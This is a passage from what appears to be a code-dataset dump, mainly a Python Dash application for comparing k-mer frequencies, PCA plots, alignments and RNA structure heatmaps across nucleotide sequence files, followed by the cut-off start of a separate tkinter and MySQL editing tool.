min=0, step=0.001, value=0)], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SI\"),\n dbc.Input(id=\"SI\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"IS\"),\n dbc.Input(id=\"IS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"II\"),\n dbc.Input(id=\"II\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SH\"),\n dbc.Input(id=\"SH\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"HS\"),\n dbc.Input(id=\"HS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"HH\"),\n dbc.Input(id=\"HH\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], )\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"SM\"),\n dbc.Input(id=\"SM\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"MS\"),\n dbc.Input(id=\"MS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"SE\"),\n dbc.Input(id=\"SE\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n\n ]),\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"BB\"),\n dbc.Input(id=\"BB\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"BS\"),\n dbc.Input(id=\"BS\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[\n html.Div(\"SB\"),\n dbc.Input(id=\"SB\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n\n ]),\n html.Tr(children=[\n 
html.Td(children=[\n html.Div(\"MM\"),\n dbc.Input(id=\"MM\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0), ], ),\n html.Td(children=[]),\n html.Td(children=[\n html.Br(),\n dbc.Button(\"Reset\", id=\"opt_btn_reset\",\n style={'margin': 'auto'})]),\n dbc.Tooltip(\n \"Reset table\",\n target=\"opt_btn_reset\"\n ),\n\n ])\n ], style={'width': '100%'}\n )\n ], style={'display': 'block'}, hidden=True),\n ]),\n dbc.ModalFooter(children=[\n dbc.ButtonGroup(\n [dbc.Button(\"Apply\", id=\"opt_btn_apply\"),\n dbc.Button(\"Close\", id=\"opt_btn_close\")],\n className=\"mr-1\",\n ),\n\n ]\n ),\n\n ],\n id=\"ex_options\",\n backdrop='static',\n centered=True\n ),\n\n ], style={\n 'height': '100vh',\n 'left': '0px',\n 'background': 'lightgrey'}),\n width=2,\n style={\"padding-right\": '0px',\n \"padding-left\": '0px',\n 'margin-right': '0px'}),\n\n # --------------------------------------- ScatterPlot ------------------------------------------------------\n dbc.Col([\n dbc.Card([\n dbc.Spinner(children=[\n dcc.Tabs(value=\"s-tab\", children=[\n dcc.Tab(label=\"Scatterplot\", value='s-tab', id=\"s-tab1\", children=[\n dcc.Graph(figure={}, id=\"scatter\", style={'height': '40vh'})\n ]),\n # -------------------------------------- FornaContainer ------------------------------------\n dcc.Tab(value='r-tab', id=\"s-tab2\", children=[\n dbc.Card(\n dashbio.FornaContainer(\n id='forna', height='300', width='400', colorScheme='custom'\n ),\n className=\"w-100 p-3\",\n ),\n ]),\n dcc.Tab(value='r-tab2', id=\"s-tab3\", children=[\n dbc.Card(\n dashbio.FornaContainer(\n id='forna2', height='300', width='400', colorScheme='custom'\n ),\n className=\"w-100 p-3\",\n ),\n ])\n ]),\n dbc.Tooltip(\n \"Scatterplot of k-mer occurences from selected files containing \"\n \"nucleotide sequences\",\n target=\"s-tab1\"\n ),\n dbc.Tooltip(\n \"Visualization of arbitrary RNA structure, highlighting k-mer occurrences of \"\n \"element strings from first selected 
structural data file\",\n target=\"s-tab2\"\n ),\n dbc.Tooltip(\n \"Visualization of arbitrary RNA structure, highlighting k-mer occurrences of \"\n \"element strings from second selected structural data file\",\n target=\"s-tab3\"\n ),\n ],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n\n ], style={\n 'background': '#f2f2f2', 'height': '50vh'}, outline=True),\n\n # -------------------------------------------- TopK ----------------------------------------------------\n dbc.Spinner(children=[dbc.Card(id=\"topK\", children=[], style={\n 'background': '#f2f2f2', 'height': '49vh', 'overflow-y': 'scroll'}, outline=True)],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n ],\n width=5,\n style={\"padding-right\": '5px',\n \"padding-left\": '10px'}),\n\n # ------------------------------------------------- PCAs ---------------------------------------------------\n dbc.Col(\n [dbc.Card([\n dbc.Spinner(children=[\n dcc.Tabs(id='tabs-example', value='Tab1', children=[\n dcc.Tab(label=\"\", value='Tab1', id=\"Tab1\", children=[\n dcc.Graph(figure={}, id=\"PCA1\",\n style={'height': '42vh'}\n )\n ]),\n dcc.Tab(label=\"\", value='Tab2', id=\"Tab2\", children=[\n dcc.Graph(figure={}, id=\"PCA2\",\n style={'height': '42vh'}\n )\n ]),\n ],\n ),\n dbc.Tooltip(\n \"Principal component analysis (PCA) of first selected file containing nucleotide sequences\",\n target=\"Tab1\"\n ),\n dbc.Tooltip(\n \"Principal component analysis (PCA) of \"\n \"second selected file containing nucleotide sequences\",\n target=\"Tab2\"\n ),\n ], color=\"primary\",\n spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n\n ], style={\n 'background': '#f2f2f2', 'height': '50vh'}, outline=True),\n\n # ------------------------------------------- MSA --------------------------------------------------\n dbc.Spinner(children=[dbc.Card(id=\"msa\", children=[], style={\n 'background': 
'#f2f2f2', 'height': '49vh', 'overflow-y': 'scroll'}, outline=True)],\n color=\"primary\", spinner_style={'position': 'absolute',\n 'top': '50%',\n 'left': '50%'\n }),\n ],\n width=5,\n style={\"padding-right\": '0px',\n \"padding-left\": '0px'}\n )\n\n ], style={'padding-top': '0px', 'padding-bottom': '0px', 'margin-top': '0px', 'margin-bottom': '0px',\n 'margin-left': '0px', 'padding-left': '0px'},\n className=\"mw-100 mh-100\"\n ),\n\n ],\n className=\"mw-100 mh-100\"),\n], className=\"mw-100 mh-100\", style={'left': '0px', 'margin-left': '0px', 'padding': '0px'})\n\n\n# ------------------------------------ Store Callback ------------------------------------------------------------------\n\n@app.callback(\n [dash.dependencies.Output('memory', 'data')],\n [dash.dependencies.Input('file1', 'value'),\n dash.dependencies.Input('file2', 'value'),\n dash.dependencies.Input('file3', 'value'),\n dash.dependencies.Input('file4', 'value'),\n dash.dependencies.Input('k', 'value'),\n dash.dependencies.Input('peak', 'value'),\n dash.dependencies.Input('top', 'value'),\n dash.dependencies.Input('Feature', 'value'),\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.State('sec_peak', 'value'),\n dash.dependencies.State('EE', 'value'),\n dash.dependencies.State('SS', 'value'),\n dash.dependencies.State('II', 'value'),\n dash.dependencies.State('MM', 'value'),\n dash.dependencies.State('BB', 'value'),\n dash.dependencies.State('SI', 'value'),\n dash.dependencies.State('IS', 'value'),\n dash.dependencies.State('SM', 'value'),\n dash.dependencies.State('MS', 'value'),\n dash.dependencies.State('ES', 'value'),\n dash.dependencies.State('SE', 'value'),\n dash.dependencies.State('HH', 'value'),\n dash.dependencies.State('HS', 'value'),\n dash.dependencies.State('SH', 'value'),\n dash.dependencies.State('SB', 'value'),\n dash.dependencies.State('BS', 'value'),\n dash.dependencies.State('db', 'value'),\n dash.dependencies.State('memory', 'data')]\n)\n# 
calculates new data for tables/diagrams\n# k: k-mer length\n# peak: peak: peak-position, where sequences should be aligned\n# top: number of best values\n# pca_feature: number of T or k-mer-Frequency for PCAs\n# apply_options_btn: n_clicks of apply-button within modal\n# sec_peak: peak status (-1: no data, 0: False, 1: True) for structural data\n# parameters (e.g. ee,ss,etc. ...): custom rates of 2-mer\n# norm_option: normalization option (none, for A.thaliana, custom)\n# data: storage to share data between callbacks\ndef updateData(f1, f2, f3, f4, k, peak, top, pca_feature, apply_options_btn, sec_peak,\n ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs, norm_option, data):\n normalization_vector = None\n\n selected_struc = None\n\n normalization_status = -1\n\n no_peak = 0\n\n no_sec_peak_false = 0\n\n no_sec_peak_true = 1\n\n ctx = dash.callback_context\n element_id = ctx.triggered[0]['prop_id'].split('.')[0]\n\n # if custom rates given, check input\n if element_id == \"opt_btn_apply\" and norm_option == 'custom_vals':\n normalization_status = 1\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n # if input contains non-digits, prevent update\n labels = [\"EE\", \"SS\", \"II\", \"MM\", \"BB\", \"SI\", \"IS\", \"SM\", \"MS\", \"ES\", \"SE\", \"HH\", \"HS\", \"SH\", \"SB\", \"BS\"]\n if None in custom_rates:\n return dash.no_update\n check_sum_passed = check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs)\n # if sum of custom rates is one, do normalization\n if check_sum_passed:\n normalization_vector = dict(zip(labels, custom_rates))\n # otherwise prevent update\n else:\n return dash.no_update\n elif element_id == \"opt_btn_apply\" and norm_option == 'at_db':\n normalization_status = 0\n elif not element_id == \"opt_btn_apply\" and data is not None:\n sec_peak = data['last_sec_peak']\n normalization_status = data['last_norm_stat']\n\n # translate dropdown value into real value\n top_opt_val = 
{'0': 10, '1': 20, '2': 50, '3': 100}\n\n top = top_opt_val[top]\n\n if peak == no_peak:\n peak = None\n\n if sec_peak == ['peaking']:\n no_sec_peak = no_sec_peak_false # =False\n else:\n no_sec_peak = no_sec_peak_true # =True\n\n # initialize (structural) data for calculations\n if data is None:\n selected = [file_list[0], file_list[1]]\n\n if struct_data is not None:\n if len(struct_data) > 1:\n selected_struc = [struct_data[0], struct_data[1]]\n else:\n selected_struc = [struct_data[0]]\n else:\n selected = [file_list[int(f1)], file_list[int(f2)]]\n if struct_data is not None:\n if len(struct_data) > 1:\n selected_struc = [struct_data[int(f3)], struct_data[int(f4)]]\n else:\n selected_struc = [struct_data[int(f3)]]\n\n new_process = initializeData.initData(file_list, selected, k, peak, top, pca_feature, selected_struc, no_sec_peak)\n\n # calculate top-table\n top_k = Processing.getTopKmer(new_process).copy()\n kmer = top_k.index\n top_k[\"K-Mer\"] = kmer\n top_k[\"\"] = [\"\" for i in range(0, len(top_k))]\n top_k = top_k[[\"\", \"K-Mer\", \"Frequency\", \"File\"]]\n top_k = top_k.sort_values(by=\"Frequency\", ascending=False)\n top_k_table = [\n dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in top_k.columns], data=top_k.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\",\n sort_action='native')]\n\n # calculate MSA\n\n algn1, algn2, f1_name, f2_name = initializeData.getAlignmentData(new_process)\n\n # if columns differ in their length, need to do some adaptions\n if (len(algn1) > 1 and len(algn2) > 1) or (len(algn1) <= 1 and len(algn2) <= 1):\n if len(algn1) <= 1 and len(algn2) <= 1:\n algn1_df = pd.DataFrame(columns=[f1_name], data=['No data to align'])\n algn2_df = pd.DataFrame(columns=[f2_name], data=['No data to align'])\n else:\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n\n algn1_df = 
pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n msas = [\n dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in algn1_df.columns],\n data=algn1_df.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\")]\n\n else:\n if len(algn1) <= 1:\n algn1 = ['No data to align']\n\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n algn1_df = pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n else:\n algn2 = ['No data to align']\n\n algn1_df = pd.DataFrame(columns=[f1_name], data=algn1)\n algn2_df = pd.DataFrame(columns=[f2_name], data=algn2)\n algn1_df = pd.concat([algn1_df, algn2_df], ignore_index=False, axis=1)\n\n msas = [dash_table.DataTable(columns=[{\"name\": i, \"id\": i} for i in algn1_df.columns],\n data=algn1_df.to_dict('records'),\n style_table={'overflow-x': 'hidden'},\n style_cell={'textAlign': 'center'},\n export_format=\"csv\")]\n\n # calculate scatterplot\n\n scatter = initializeData.getScatterPlot(new_process)\n\n # calculate PCAs\n\n pca_12, file1, file2 = initializeData.getPCA(new_process)\n pcas = [pca_12, file1, file2]\n\n seq_len = new_process.getSeqLen()\n\n # calculate RNA-Template(s), dotbracket-string(s), color-vector, color-scale\n # and color-domain(s) (highest value in color-vector)\n\n if struct_data is not None:\n\n structure_info = initializeData.getTemplateSecondaryStructure(new_process, normalization_vector,\n normalization_status, no_sec_peak)\n\n struct1, struct2, color1, color2, color_domain_max1, color_domain_max2, color_scale = structure_info\n\n if struct1 is not None and struct2 is not None:\n templates = [struct1[0], struct2[0]]\n dbs = [struct1[1], struct2[1]]\n elif struct1 is not None:\n templates = [struct1[0]]\n dbs = [struct1[1]]\n else:\n templates = []\n dbs = []\n else:\n templates = None\n dbs = None\n color1 = None\n color2 = None\n color_domain_max1 = None\n 
color_domain_max2 = None\n color_scale = None\n\n data = {'topK': top_k_table, 'msas': msas, 'scatter': scatter, 'pcas': pcas, 'seqLen': seq_len,\n 'templates': templates, 'dbs': dbs, 'colors': [color1, color2],\n 'color_max': [color_domain_max1, color_domain_max2], 'color_scale': color_scale,\n 'last_sec_peak': sec_peak, 'last_norm_stat': normalization_status}\n\n return [data]\n\n\n# --------------------------------------- File Dropdown Updater --------------------------------------------------------\n@app.callback([\n dash.dependencies.Output(\"file1\", \"options\"),\n dash.dependencies.Input(\"file2\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f2: second selected file\ndef updateFile1Dropdown(f2):\n return updateFileList(f2, False)\n\n\n@app.callback([\n dash.dependencies.Output(\"file2\", \"options\"),\n dash.dependencies.Input(\"file1\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f1: first selected file\ndef updateFile2Dropdown(f1):\n return updateFileList(f1, False)\n\n\n# disables already selected file in other dropdown\n# val: (structural) file\n# struct: bool (True= structural file is given)\ndef updateFileList(val, struct):\n if struct and struct_data is not None:\n files = struct_data\n elif struct and struct_data is None:\n return [{\"label\": \"-\", \"value\": \"0\"}]\n else:\n files = file_list\n\n option = [\n {'label': os.path.basename(files[i]), 'value': str(i)} if not (str(i) == val)\n else {'label': os.path.basename(files[i]), 'value': str(i), 'disabled': True}\n for i in range(0, len(files))]\n\n return [option]\n\n\n# --------------------------------------- Structure File Dropdown Updater ----------------------------------------------\n@app.callback([\n dash.dependencies.Output(\"file3\", \"options\"),\n dash.dependencies.Input(\"file4\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f4: second selected structural file\ndef updateFile4Dropdown(f4):\n return 
updateFileList(f4, True)\n\n\n@app.callback([\n dash.dependencies.Output(\"file4\", \"options\"),\n dash.dependencies.Input(\"file3\", \"value\"),\n])\n# returns new option for dropdown based on selection\n# f1: first selected structural file\ndef updateFile3Dropdown(f3):\n if struct_data is not None and len(struct_data) > 1:\n return updateFileList(f3, True)\n else:\n raise PreventUpdate\n\n\n# --------------------------------------- Slider Values Updater --------------------------------------------------------\n\n\n@app.callback(\n [\n dash.dependencies.Output(\"k\", \"min\"),\n dash.dependencies.Output(\"k\", \"max\"),\n dash.dependencies.Output(\"k\", \"marks\"),\n dash.dependencies.Output(\"peak\", \"min\"),\n dash.dependencies.Output(\"peak\", \"max\"),\n dash.dependencies.Output(\"peak\", \"marks\"),\n ],\n [\n dash.dependencies.Input('memory', 'modified_timestamp'),\n dash.dependencies.State('memory', 'data'),\n ],\n)\n# calculates slider ranges (marks)\n# fil1/file2: input file\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateSliderRange(ts, data):\n if ts is None:\n raise PreventUpdate\n k_p_slider_max = data['seqLen']\n k_p_slider_min = 2\n\n k_slider_max = k_p_slider_max - 1\n peak_min = 0\n\n # calculation of new slider ranges if files were changed\n\n k_range = markSliderRange(k_p_slider_min, k_slider_max, False)\n peak_range = markSliderRange(peak_min, k_p_slider_max, True)\n\n return k_p_slider_min, k_slider_max, k_range, peak_min, k_p_slider_max, peak_range\n\n\n# ----------------------------------------- Forna-Container Update -----------------------------------------------------\n\n@app.callback(\n dash.dependencies.Output('forna', 'sequences'),\n dash.dependencies.Output('forna', 'customColors'),\n dash.dependencies.Output('s-tab2', 'label'),\n dash.dependencies.Output('s-tab2', 'disabled'),\n dash.dependencies.Output('forna2', 'sequences'),\n dash.dependencies.Output('forna2', 
'customColors'),\n dash.dependencies.Output('s-tab3', 'label'),\n dash.dependencies.Output('s-tab3', 'disabled'),\n [dash.dependencies.Input('memory', 'data'),\n dash.dependencies.Input('file3', 'value'),\n dash.dependencies.Input('file4', 'value'),\n ]\n)\n# create RNA Structure Heatmap visualizations\n# data: store\n# f3: first selected structural file\n# f4: second selected structural file\ndef show_selected_sequences(data, f3, f4):\n if data is None:\n raise PreventUpdate\n\n template_list = data['templates']\n dotbracket_list = data['dbs']\n color_domain_max1 = data['color_max'][0]\n color_domain_max2 = data['color_max'][1]\n\n # if only one structural file is given, color_domain_max and color_domain_min are not changed\n domain_nbr = 2\n if color_domain_max1 is None:\n color_domain_max1 = 0\n domain_nbr = 1\n if color_domain_max2 is None:\n color_domain_max2 = 0\n domain_nbr = 1\n\n color_domain_max = ((color_domain_max1 + color_domain_max2) / domain_nbr)\n\n if data['colors'][0] is not None:\n color_vals1 = list(set(data['colors'][0].values()))\n if 0 in color_vals1:\n color_vals1.remove(0)\n color_domain_min1 = min(color_vals1)\n else:\n color_domain_min1 = 0\n\n if data['colors'][1] is not None:\n color_vals2 = list(set(data['colors'][1].values()))\n if 0 in color_vals2:\n color_vals2.remove(0)\n color_domain_min2 = min(color_vals2)\n else:\n color_domain_min2 = 0\n\n color_domain_min = (color_domain_min1 + color_domain_min2) / domain_nbr\n\n color_range = data['color_scale']\n if color_range is None:\n # prevents divideByZero error\n # has no effect because if scale is None then there is not structural data\n color_range_length = 2\n else:\n color_range_length = len(color_range)\n\n steps = ((color_domain_max - color_domain_min) / (color_range_length - 1))\n if steps == 0:\n steps = 1\n\n color_domain = [i for i in float_range(color_domain_min, steps, (color_range_length - 1))]\n color_domain.append(color_domain_max)\n\n # disable tab for files if no or 
only one structural file is given\n disable_t1 = False\n disable_t2 = False\n\n # color-vector\n custom_colors = None\n custom_colors2 = None\n\n tab1_label = \"RNA-Structure Heatmap 1\"\n tab2_label = \"RNA-Structure Heatmap 2\"\n\n if struct_data is not None:\n\n color1 = data['colors'][0]\n\n tab1_label = os.path.basename(struct_data[int(f3)]) + \" Structure Heatmap\"\n\n # create color-vector-object for FornaContainer\n custom_colors = {\n 'domain': color_domain,\n 'range': color_range,\n 'colorValues': {\n 'template1': color1,\n }\n }\n\n # create sequence-object for FornaContainer\n template1 = [{\n 'sequence': template_list[0],\n 'structure': dotbracket_list[0],\n 'options': {'name': 'template1'}\n }]\n\n if len(template_list) > 1: # more than one structure file committed\n color2 = data['colors'][1]\n\n tab2_label = os.path.basename(struct_data[int(f4)]) + \" Structure Heatmap\"\n\n custom_colors2 = {\n 'domain': color_domain,\n 'range': color_range,\n 'colorValues': {\n 'template2': color2,\n }\n }\n\n template2 = [{\n 'sequence': template_list[1],\n 'structure': dotbracket_list[1],\n 'options': {'name': 'template2'}\n }]\n\n else: # if no second structural file is available\n template2 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n disable_t2 = True\n\n else: # if not structural data is available\n template1 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n template2 = [{\n 'sequence': \"\",\n 'structure': \"\"\n }]\n disable_t1 = True\n disable_t2 = True\n\n return template1, custom_colors, tab1_label, disable_t1, template2, custom_colors2, tab2_label, disable_t2\n\n\n# -------------------------------------------- Modals Updater ----------------------------------------------------------\n\n@app.callback([dash.dependencies.Output('ex_options', 'is_open'),\n dash.dependencies.Output('norm_input', 'hidden'),\n ],\n [dash.dependencies.Input('memory', 'modified_timestamp'),\n dash.dependencies.Input('opt_btn_open', 'n_clicks'),\n 
dash.dependencies.Input('opt_btn_close', 'n_clicks'),\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.Input('db', 'value'),\n dash.dependencies.Input('error', 'hidden'),\n dash.dependencies.Input('error_type', 'hidden'),\n dash.dependencies.State('ex_options', 'is_open'),\n ], prevent_initial_call=True)\n# opens or closes modal\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\n# btn_open, btn_close, btn_apply: n_clicks of open-/apply/reset-button for/in modal\n# norm_val: normalization option (none, for A.thaliana, custom)\n# error1, error2: error messages hidden status (True/False)\n# is_open: modal status (True/False)\ndef updateExtendedOptionModal(ts, btn_open, btn_close, btn_apply, norm_val, error1, error2, is_open):\n if ts is None:\n raise PreventUpdate\n\n # determine which button was triggered\n ctx = dash.callback_context\n btn_id = ctx.triggered[0]['prop_id'].split('.')[0]\n\n if norm_val == 'custom_vals':\n show_table = False\n else:\n show_table = True\n\n # if open-/close button was triggered, then open or close modal\n if btn_id == \"opt_btn_open\" or btn_id == \"opt_btn_close\":\n return [not is_open, show_table]\n # if apply button was triggered, close modal if no error message is shown\n elif btn_id == 'opt_btn_apply':\n if not error1 or not error2:\n return [is_open, show_table]\n else:\n return [not is_open, show_table]\n else:\n return [is_open, show_table]\n\n\n@app.callback([\n dash.dependencies.Output('EE', 'value'),\n dash.dependencies.Output('SS', 'value'),\n dash.dependencies.Output('II', 'value'),\n dash.dependencies.Output('MM', 'value'),\n dash.dependencies.Output('BB', 'value'),\n dash.dependencies.Output('SI', 'value'),\n dash.dependencies.Output('IS', 'value'),\n dash.dependencies.Output('SM', 'value'),\n dash.dependencies.Output('MS', 'value'),\n dash.dependencies.Output('ES', 'value'),\n dash.dependencies.Output('SE', 'value'),\n dash.dependencies.Output('HH', 
'value'),\n dash.dependencies.Output('HS', 'value'),\n dash.dependencies.Output('SH', 'value'),\n dash.dependencies.Output('SB', 'value'),\n dash.dependencies.Output('BS', 'value'),\n\n],\n [dash.dependencies.Input('opt_btn_reset', 'n_clicks'),\n ], prevent_initial_call=True)\n# resets custom rate table in modal\n# reset_btn: n_clicks of reset button\ndef resetTable(reset_btn):\n if reset_btn:\n return [0 for i in range(0, 16)]\n else:\n return [dash.no_update for i in range(0, 16)]\n\n\n@app.callback([\n dash.dependencies.Output('error', 'hidden'),\n dash.dependencies.Output('error_type', 'hidden'),\n\n],\n [\n dash.dependencies.Input('opt_btn_apply', 'n_clicks'),\n dash.dependencies.Input('db', 'value'),\n dash.dependencies.State('EE', 'value'),\n dash.dependencies.State('SS', 'value'),\n dash.dependencies.State('II', 'value'),\n dash.dependencies.State('MM', 'value'),\n dash.dependencies.State('BB', 'value'),\n dash.dependencies.State('SI', 'value'),\n dash.dependencies.State('IS', 'value'),\n dash.dependencies.State('SM', 'value'),\n dash.dependencies.State('MS', 'value'),\n dash.dependencies.State('ES', 'value'),\n dash.dependencies.State('SE', 'value'),\n dash.dependencies.State('HH', 'value'),\n dash.dependencies.State('HS', 'value'),\n dash.dependencies.State('SH', 'value'),\n dash.dependencies.State('SB', 'value'),\n dash.dependencies.State('BS', 'value'),\n ], prevent_initial_call=True)\n# show error message, if input in custom rates table is invalid\n# apply_btn: n_clicks of apply button for custom rates\n# norm_option: normalization options (none, for A.thaliana, custom)\n# parameter (e.g. ee,ss,etc. 
...): custom rates for 2-mer\ndef showErrorMessages(apply_btn, norm_option, ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs):\n hide_error_msg = True\n hide_error_type_msg = True\n\n ctx = dash.callback_context\n triggered_component = ctx.triggered[0]['prop_id'].split('.')[0]\n\n if triggered_component == 'opt_btn_apply':\n if not norm_option == 'custom_vals':\n return [hide_error_msg, hide_error_type_msg]\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n if None in custom_rates:\n hide_error_type_msg = False\n return [hide_error_msg, hide_error_type_msg]\n check_sum_passed = check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs)\n if not check_sum_passed:\n hide_error_msg = False\n return [hide_error_msg, hide_error_type_msg]\n\n\n@app.callback([dash.dependencies.Output('opt_btn_open', 'disabled'),\n ],\n [dash.dependencies.Input('memory', 'modified_timestamp')])\n# disables 'extended options' button if no structural data is available\n# ts: store timestamp\ndef disableButton(ts):\n if ts is None:\n raise PreventUpdate\n\n disable_btn = False\n if struct_data is None:\n disable_btn = True\n\n return [disable_btn]\n\n\n# --------------------------------------------- Diagram/Table Updater --------------------------------------------------\n\n# Tables/Diagrams only get updated figures/datatables here\n\n@app.callback(dash.dependencies.Output('scatter', 'figure'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateScatter(data):\n if data is None:\n raise PreventUpdate\n return data.get('scatter', 0)\n\n\n@app.callback([dash.dependencies.Output('PCA1', 'figure'),\n dash.dependencies.Output('PCA2', 'figure'),\n dash.dependencies.Output('Tab1', 'label'),\n dash.dependencies.Output('Tab2', 'label')],\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share 
data between callbacks\ndef updatePCAs(data):\n if data is None:\n raise PreventUpdate\n pca_data = data.get('pcas', 0)\n pca1 = pca_data[0][0]\n pca2 = pca_data[0][1]\n file1 = pca_data[1]\n file2 = pca_data[2]\n return [pca1, pca2, file1, file2]\n\n\n@app.callback(dash.dependencies.Output('topK', 'children'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateTopK(data):\n if data is None:\n raise PreventUpdate\n return data.get('topK', 0)\n\n\n@app.callback(dash.dependencies.Output('msa', 'children'),\n dash.dependencies.Input('memory', 'data'))\n# ts: timestamp when data was modified\n# data: storage to share data between callbacks\ndef updateMSA(data):\n if data is None:\n raise PreventUpdate\n return data.get('msas', 0)\n","sub_path":"src/dashView/dashLayout.py","file_name":"dashLayout.py","file_ext":"py","file_size_in_byte":48636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61847024","text":"from tkinter import *\r\n\r\nimport mysql.connector\r\n\r\nfrom globals import std_bg\r\n\r\n\r\ndef attributes_sets_options():\r\n db = mysql.connector.connect(host=\"localhost\", user=\"root\", database=\"test\")\r\n cursor = db.cursor()\r\n\r\n cursor.execute(\"SELECT * FROM attributes_sets\")\r\n db_results = cursor.fetchall()\r\n\r\n results = []\r\n for i in range(len(db_results)):\r\n results.append(list(db_results[i]))\r\n for j in range(len(results[i])):\r\n if results[i][j] is None:\r\n results[i][j] = ''\r\n\r\n # Sortowanie wyników dla lepszego odbioru użytkownika\r\n results = sorted(results, key=lambda x: x[1])\r\n\r\n root = Tk()\r\n root.title('Automatyzacja opisów')\r\n root.geometry('570x550')\r\n root.configure(bg=std_bg)\r\n\r\n # Nie rozumiem tego kodu, ale on dodaje suwak\r\n main_frame = Frame(root, bg=std_bg)\r\n main_frame.pack(fill=BOTH, expand=1)\r\n canvas = Canvas(main_frame, bg=std_bg)\r\n 
canvas.pack(side=LEFT, fill=BOTH, expand=1)\r\n scrollbar = Scrollbar(main_frame, orient=VERTICAL, command=canvas.yview, bg=std_bg)\r\n scrollbar.pack(side=RIGHT, fill=Y)\r\n canvas.configure(yscrollcommand=scrollbar.set, bg=std_bg)\r\n canvas.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\r\n view_frame = Frame(canvas, bg=std_bg)\r\n canvas.create_window((0, 0), window=view_frame, anchor='nw')\r\n\r\n \"\"\" NAZWY KOLUMN \"\"\"\r\n\r\n frame_cols = LabelFrame(view_frame, text=\"Nazwy kolumn\")\r\n frame_cols.configure(bg=std_bg)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Nazwa\").grid(row=0, column=0,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Zestaw1\").grid(row=0, column=1,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Waga\").grid(row=0, column=2,\r\n pady=2)\r\n Label(frame_cols, width=17, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Zestaw2\").grid(row=0, column=3,\r\n pady=2)\r\n Label(frame_cols, width=4, bg='#525252', fg='#EEEEEE', justify=LEFT, text=\"Usuń\").grid(row=0, column=4, pady=2)\r\n frame_cols.grid(row=1, column=0)\r\n\r\n \"\"\" DANE Z BAZY DANYCH \"\"\"\r\n\r\n def change_data():\r\n changes = []\r\n for i in range(len(res_label)):\r\n query_SET = ''\r\n if res_label[i][0].get() != results[i][1]:\r\n query_SET += f'Name=\"{res_label[i][0].get()}\", '\r\n if res_label[i][1].get() != results[i][2]:\r\n query_SET += f'Set1=\"{res_label[i][1].get()}\", 